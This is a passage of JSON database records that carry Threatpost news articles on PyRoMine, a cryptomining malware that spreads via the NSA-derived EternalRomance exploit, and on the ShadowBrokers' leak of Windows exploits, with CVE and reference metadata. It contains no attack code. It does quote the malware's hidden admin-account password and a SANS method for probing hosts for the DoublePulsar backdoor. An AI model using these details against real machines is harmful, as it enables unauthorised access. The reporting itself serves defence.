[Smominru](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>) and [WannaMine](<https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/>) \u2013 with great success.\n\nManuel added that because the patch rate is clearly low for the leveraged vulnerabilities, he expects commodity malware to continue to use the NSA exploits for some time to come. More concerning, PyRoMine\u2019s backdoor strategy could become a hallmark going forward.\n\n\u201cI think is going to be something that we see much more of in the future as the tools that are being deployed are multi-faceted,\u201d said Chris Roberts, chief security architect at Acalvio, in an emailed comment. \u201cIn this case, it\u2019s not only mining and disabling security services. It\u2019s also adding itself into several account types, opening up RDP (3389) and basically laying the welcome mat out for future attacks. Several of the latest tool sets are coming armed with various payloads that simply have functionality to deploy attacks, harvest for data and also take advantage of lax security and processing time. And, this all comes in a nice, neat package using the simple issue that we (the human) haven\u2019t patched or don\u2019t pay attention to what we are downloading/clicking. Once again, we are the attack vector and the computer suffers.\u201d\n", "published": "2018-04-26T18:21:13", "modified": "2018-04-26T18:21:13", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/", "reporter": "Tara Seals", "references": ["https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html", "https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/", "https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/", "https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/", "https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/"], "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "lastseen": "2019-04-25T05:50:11", "history": [{"bulletin": {"id": "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "hash": "9dd27daad748c2cb91318dd687e30247", "type": "threatpost", "bulletinFamily": "info", "title": "PyRoMine Uses NSA Exploit for Monero Mining and Backdoors", "description": "The ShadowBrokers\u2019 release of a trove of National Security Agency exploits last year appears to be the gift that keeps on giving, to the hacker community at least: A fresh malware that uses the EternalRomance tool has hit the scene, with Monero-mining as the stated goal. However, more damaging follow-on attacks are likely the endgame.\n\nThe bad code is a Python-based cryptocurrency mining malware, according to Fortinet\u2019s FortiGuard Labs, which first [discovered it](<https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html>) this month. Because the malware uses the EternalRomance exploit, the researchers have given it the snappy name of \u201cPyRoMine.\u201d\n\nThe malware can be downloaded as an executable file compiled with PyInstaller, which is a program that packages code written in Python into stand-alone executables. This means that, conveniently, there is no need to install Python on the machine in order to execute the Python-based PyRoMine. Once installed, it sets about silently stealing CPU resources from unwitting victims to aim its proverbial drill bit at uncovering Monero profits.\n\n\u201cWe don\u2019t know for sure how it arrives on a system, but considering that this is the type of malware that needs to be mass distributed, it is safe to assume that it arrives via spam email or drive-by-download,\u201d FortiGuard security researcher Jasper Manuel said in an email interview.\n\nWorryingly, PyRoMine also sets up a hidden default account on the victimized machine with system administrator privileges, using the password \u201cP@ssw0rdf0rme.\u201d It\u2019s likely that this would be used for re-infection and further attacks, according to Manuel.\n\n\u201cIt is fairly likely that future attacks could happen,\u201d he told Threatpost. \u201cAlthough this malware is not a botnet because it doesn\u2019t phone home to report an infection and doesn\u2019t wait for commands, it still sets up an account on the affected machine and enables Remote Desktop Protocol. The attackers could use the same channel to connect to the machine using the created account to do further attacks.\u201d\n\n**Ripe for Spreading**\n\nBased on the earnings that PyRoMine has so to date (only about $650), it hasn\u2019t exactly lived up to its name and caught fire on the propagation front. But that could rapidly change: For one, the choice of Monero indicates that the criminals are looking to cast a wide net, given that the currency offers an important \u201cfeature\u201d that make it more suitable to the mass market than the more venerable Bitcoin: It relies on a proof-of-work algorithm called CryptoNight, designed for ordinary computers and even mobile phones, rather than for high-end GPUs or the specialized hardware needed for efficient Bitcoin mining. Thus, the potential attack surface consists of consumers and businesses alike, globally.\n\nSecondly, cybercriminals have discovered that enterprises and individuals have been pretty slow when it comes to patching the known vulnerabilities that the NSA tools leverage.\n\nThe ShadowBrokers [leaked a whole treasure chest](<https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/>) of hacking tools and zero-day exploits in 2017, attributed to the Equation Group, which is believed to be an arm of the NSA\u2019s Tailored Access Operations unit. They target Windows XP/Vista/8.1/7/10 and Windows Server 2003/2008/2012/2016, taking advantage of a pair of vulnerabilities, CVE-2017-0144 and CVE-2017-0145. Microsoft [patched these very quickly](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>) after the tools were made public.\n\n\u201cThe patch for EternalRomance was released a year ago, but many still don\u2019t think proactive about security,\u201d Manuel told Threatpost. \u201cThe fact that cybercriminals use these exploits tells us that they still profit by using these exploits in their malware.\u201d\n\nAnd finally, EternalRomance is a remote code execution (RCE) exploit that abuses the legacy SMBv1 file-sharing protocol. SMBv1 is typically used only within the local area network of a business, but all too often it\u2019s left exposed to the internet \u2013one of the contributing factors as to why the EternalX attacks WannaCry and NotPetya [were able to spread so widely](<https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/>).\n\n\u201cIn the past, we have seen that these exploits were used by state-sponsored threat actors,\u201d Manuel told us. \u201cWithin days of the release, we started seeing these exploits being used by commodity malware like cryptominers and info-stealers to target general victims.\u201d\n\nPyRoMine isn\u2019t the first miner to use the NSA tools: Researchers have discovered malware authors using the EternalBlue exploit in other cryptocurrency mining malware, such as [Adylkuzz](<https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/>), [Smominru](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>) and [WannaMine](<https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/>) \u2013 with great success.\n\nManuel added that because the patch rate is clearly low for the leveraged vulnerabilities, he expects commodity malware to continue to use the NSA exploits for some time to come. More concerning, PyRoMine\u2019s backdoor strategy could become a hallmark going forward.\n\n\u201cI think is going to be something that we see much more of in the future as the tools that are being deployed are multi-faceted,\u201d said Chris Roberts, chief security architect at Acalvio, in an emailed comment. \u201cIn this case, it\u2019s not only mining and disabling security services. It\u2019s also adding itself into several account types, opening up RDP (3389) and basically laying the welcome mat out for future attacks. Several of the latest tool sets are coming armed with various payloads that simply have functionality to deploy attacks, harvest for data and also take advantage of lax security and processing time. And, this all comes in a nice, neat package using the simple issue that we (the human) haven\u2019t patched or don\u2019t pay attention to what we are downloading/clicking. Once again, we are the attack vector and the computer suffers.\u201d\n", "published": "2018-04-26T14:21:13", "modified": "2018-05-01T12:49:38", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/", "reporter": "Tara Seals", "references": ["https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html", "https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/", "https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/", "https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/", "https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/"], "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "lastseen": "2018-10-06T22:52:29", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2018-10-06T22:52:29"}}, "objectVersion": "1.4"}, "lastseen": "2018-10-06T22:52:29", "differentElements": ["modified"], "edition": 1}, {"bulletin": {"id": "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "hash": "82d1a2b6dbff80a70da17354407118ec", "type": "threatpost", "bulletinFamily": "info", "title": "PyRoMine Uses NSA Exploit for Monero Mining and Backdoors", "description": "The ShadowBrokers\u2019 release of a trove of National Security Agency exploits last year appears to be the gift that keeps on giving, to the hacker community at least: A fresh malware that uses the EternalRomance tool has hit the scene, with Monero-mining as the stated goal. However, more damaging follow-on attacks are likely the endgame.\n\nThe bad code is a Python-based cryptocurrency mining malware, according to Fortinet\u2019s FortiGuard Labs, which first [discovered it](<https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html>) this month. Because the malware uses the EternalRomance exploit, the researchers have given it the snappy name of \u201cPyRoMine.\u201d\n\nThe malware can be downloaded as an executable file compiled with PyInstaller, which is a program that packages code written in Python into stand-alone executables. This means that, conveniently, there is no need to install Python on the machine in order to execute the Python-based PyRoMine. Once installed, it sets about silently stealing CPU resources from unwitting victims to aim its proverbial drill bit at uncovering Monero profits.\n\n\u201cWe don\u2019t know for sure how it arrives on a system, but considering that this is the type of malware that needs to be mass distributed, it is safe to assume that it arrives via spam email or drive-by-download,\u201d FortiGuard security researcher Jasper Manuel said in an email interview.\n\nWorryingly, PyRoMine also sets up a hidden default account on the victimized machine with system administrator privileges, using the password \u201cP@ssw0rdf0rme.\u201d It\u2019s likely that this would be used for re-infection and further attacks, according to Manuel.\n\n\u201cIt is fairly likely that future attacks could happen,\u201d he told Threatpost. \u201cAlthough this malware is not a botnet because it doesn\u2019t phone home to report an infection and doesn\u2019t wait for commands, it still sets up an account on the affected machine and enables Remote Desktop Protocol. The attackers could use the same channel to connect to the machine using the created account to do further attacks.\u201d\n\n**Ripe for Spreading**\n\nBased on the earnings that PyRoMine has so to date (only about $650), it hasn\u2019t exactly lived up to its name and caught fire on the propagation front. But that could rapidly change: For one, the choice of Monero indicates that the criminals are looking to cast a wide net, given that the currency offers an important \u201cfeature\u201d that make it more suitable to the mass market than the more venerable Bitcoin: It relies on a proof-of-work algorithm called CryptoNight, designed for ordinary computers and even mobile phones, rather than for high-end GPUs or the specialized hardware needed for efficient Bitcoin mining. Thus, the potential attack surface consists of consumers and businesses alike, globally.\n\nSecondly, cybercriminals have discovered that enterprises and individuals have been pretty slow when it comes to patching the known vulnerabilities that the NSA tools leverage.\n\nThe ShadowBrokers [leaked a whole treasure chest](<https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/>) of hacking tools and zero-day exploits in 2017, attributed to the Equation Group, which is believed to be an arm of the NSA\u2019s Tailored Access Operations unit. They target Windows XP/Vista/8.1/7/10 and Windows Server 2003/2008/2012/2016, taking advantage of a pair of vulnerabilities, CVE-2017-0144 and CVE-2017-0145. Microsoft [patched these very quickly](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>) after the tools were made public.\n\n\u201cThe patch for EternalRomance was released a year ago, but many still don\u2019t think proactive about security,\u201d Manuel told Threatpost. \u201cThe fact that cybercriminals use these exploits tells us that they still profit by using these exploits in their malware.\u201d\n\nAnd finally, EternalRomance is a remote code execution (RCE) exploit that abuses the legacy SMBv1 file-sharing protocol. SMBv1 is typically used only within the local area network of a business, but all too often it\u2019s left exposed to the internet \u2013one of the contributing factors as to why the EternalX attacks WannaCry and NotPetya [were able to spread so widely](<https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/>).\n\n\u201cIn the past, we have seen that these exploits were used by state-sponsored threat actors,\u201d Manuel told us. \u201cWithin days of the release, we started seeing these exploits being used by commodity malware like cryptominers and info-stealers to target general victims.\u201d\n\nPyRoMine isn\u2019t the first miner to use the NSA tools: Researchers have discovered malware authors using the EternalBlue exploit in other cryptocurrency mining malware, such as [Adylkuzz](<https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/>), [Smominru](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>) and [WannaMine](<https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/>) \u2013 with great success.\n\nManuel added that because the patch rate is clearly low for the leveraged vulnerabilities, he expects commodity malware to continue to use the NSA exploits for some time to come. More concerning, PyRoMine\u2019s backdoor strategy could become a hallmark going forward.\n\n\u201cI think is going to be something that we see much more of in the future as the tools that are being deployed are multi-faceted,\u201d said Chris Roberts, chief security architect at Acalvio, in an emailed comment. \u201cIn this case, it\u2019s not only mining and disabling security services. It\u2019s also adding itself into several account types, opening up RDP (3389) and basically laying the welcome mat out for future attacks. Several of the latest tool sets are coming armed with various payloads that simply have functionality to deploy attacks, harvest for data and also take advantage of lax security and processing time. And, this all comes in a nice, neat package using the simple issue that we (the human) haven\u2019t patched or don\u2019t pay attention to what we are downloading/clicking. Once again, we are the attack vector and the computer suffers.\u201d\n", "published": "2018-04-26T14:21:13", "modified": "2018-04-26T14:21:13", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/", "reporter": "Tara Seals", "references": ["https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html", "https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/", "https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/", "https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/", "https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/"], "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "lastseen": "2019-01-23T05:27:19", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2019-01-23T05:27:19"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-27803"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:42031"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:EA407B51944632C248FEB495594123EA"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"]}, {"type": "securelist", "idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A"]}], "modified": "2019-01-23T05:27:19"}}, "objectVersion": "1.4"}, "lastseen": "2019-01-23T05:27:19", "differentElements": ["modified", "published"], "edition": 2}], "viewCount": 6, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2019-04-25T05:50:11", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "mmpc", "idList": ["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:43DBD2171542112FA727093E66C885BD", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:0A9B457BE0B9439673D350C9169DE4B4", "THREATPOST:C3F0F18B19C932E9BCA4BADA69F3D863", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:C40754E8387BCCE75482449E2A457651", "THREATPOST:1B29120EF1DBE107B55050178910AACD"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "fireeye", "idList": ["FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2019-04-25T05:50:11", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.threatpost.ThreatpostBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "hash": "5c1d3d512af20e8289b906bebc2f12f0", "type": "threatpost", "bulletinFamily": "info", "title": "ShadowBrokers' Windows Zero-Days Already Patched", "description": "Hours after what was thought to be a damaging release of [NSA hacking tools](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) for Windows systems, Microsoft quelled some anxiety with a late-night statement on Friday that most of the vulnerabilities disclosed by the ShadowBrokers had already been patched.\n\nThe biggest surprise was that the most recent updates came in March in a bulletin, MS17-010, addressing six critical remote code execution vulnerabilities in Windows Server Message Block (SMB). Two of the six (CVE-2017-0146 and CVE-2017-0147) were in possession of the Equation Group and exploited in EternalBlue, EternalChampion, EternalSynergy and EternalRomance,\n\nThe March update was a highly anticipated set of patches since Microsoft\u2019s February updates were a last-minute postponement with little explanation given at the time or since for the delay. Microsoft would not comment further after publishing a blog Friday reassuring users that the alleged zero-days in the ShadowBrokers\u2019 dump had [already been fixed](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>).\n\n\u201cWe\u2019ve investigated and confirmed that the exploits disclosed by the Shadow Brokers have already been addressed by previous updates to our supported products,\u201d Microsoft said in a statement. \u201cCustomers with up-to-date software are already protected.\u201d\n\nMicrosoft did not, however, acknowledge who disclosed the respective vulnerabilities , which runs contrary to the majority of bugs patched on a monthly basis. This has given rise to a number of theories speculating that perhaps the government had privately disclosed the bugs to Microsoft through its Vulnerabilities Equities Process (VEP), that Microsoft may have paid for the bugs through a third party or directly to the ShadowBrokers, or that Microsoft followed breadcrumbs from a [Jan. 8 dump](<https://threatpost.com/shadowbrokers-selling-windows-exploits-attack-tools/123027/>) that included the code names for some of the exploits leaked on Friday, including EternalRomance and EternalSynergy. Researcher Jacob Williams, aka [MalwareJake](<http://malwarejake.blogspot.com/2017/01/implications-of-newest-shadow-brokers.html>), said there was evidence at the time indicating the existence of a SMB zero day. Williams also shared a price list from the January dump that he said could lend some credence to the possibility of a SMB 0day.\n\n\u201cMost interesting perhaps is the fact that the exploits contain a possible SMB zero day exploit,\u201d Williams wrote. \u201cFor the price requested, one would hope it is a zero day. The price is far too high for an exploit for a known vulnerability.\u201d\n\nThe SANS Institute, meanwhile, looked at a post-exploitation communications channel called [Double Pulsar](<https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/>), used by the EternalBlue SMB zero day. SANS said the channel uses the Transaction 2 Subcommand Extension (Trans2) feature in SMB for packet capture. From the SANS report:\n\n\u201cIn packet 13 of the pcap, the system running the exploit sends a \u201ctrans2 SESSION_SETUP\u201d request to the victim. This happens before the actual exploit is sent. The intent of this request is to check if the system is already compromised. Infected or not, the system will respond with a \u201cNot Implemented\u201d message. But as part of the message, a \u201cMultiplex ID\u201d is returned that is 65 (0x41) for normal systems and 81 (0x51) for infected systems. If a system is infected, then SMB can be used as a covert channel to exfiltrate data or launch remote commands.\n\nWhile the four SMB zero days are the attention-grabbers from Friday\u2019s dump of Windows tools, the remaining vulnerabilities data back prior to the 2006 release of Windows Vista. Most of the patched vulnerabilities target flaws in SMB, while others are in Windows Server and Kerberos. Three will not be patched, Microsoft said.\n\n\u201cOf the three remaining exploits, \u201cEnglishmanDentist\u201d, \u201cEsteemAudit\u201d, and \u201cExplodingCan\u201d, none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk,\u201d Microsoft said. \u201cCustomers still running prior versions of these products are encouraged to upgrade to a supported offering.\u201d\n\nFriday\u2019s dump also included exploits used by the NSA to target two SWIFT Service Bureaus, outsourcing services used by banks to manage access and transactions on the SWIFT network. The SWIFT-related archives is called JEEPFLEA and contains credentials and the architecture data on EastNets, the Middle East\u2019s largest SWIFT Service Bureau, researcher Matt Suiche said.\n\nSuiche explained these bank transactions are handled on an Oracle database running SWIFT software. The archive includes tools used by the NSA to take data from the Oracle installation, including a list of users and SWIFT message queries, Suiche said.\n\n\u201cIn this case, if Shadow Brokers claims are indeed verified, it seems that the NSA sought to totally capture the backbone of international financial system to have a God\u2019s eye into a SWIFT Service Bureau \u2014 and potentially the entire SWIFT network,\u201d said researcher Matt Suiche in a blog posted today explaining [his analysis](<https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195>) of the data dump. \u201cThis would fit within standard procedure as a covert entity entrusted with covert actions that may or may not be legal in a technical sense.\u201d\n", "published": "2017-04-17T14:06:34", "modified": "2017-04-17T18:06:34", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/", "reporter": "Michael Mimoso", "references": ["https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/", "https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/", "https://threatpost.com/shadowbrokers-selling-windows-exploits-attack-tools/123027/", "http://malwarejake.blogspot.com/2017/01/implications-of-newest-shadow-brokers.html", "https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/", "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195"], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-11882"], "lastseen": "2018-10-06T22:53:49", "history": [], "viewCount": 10, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2018-10-06T22:53:49", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": 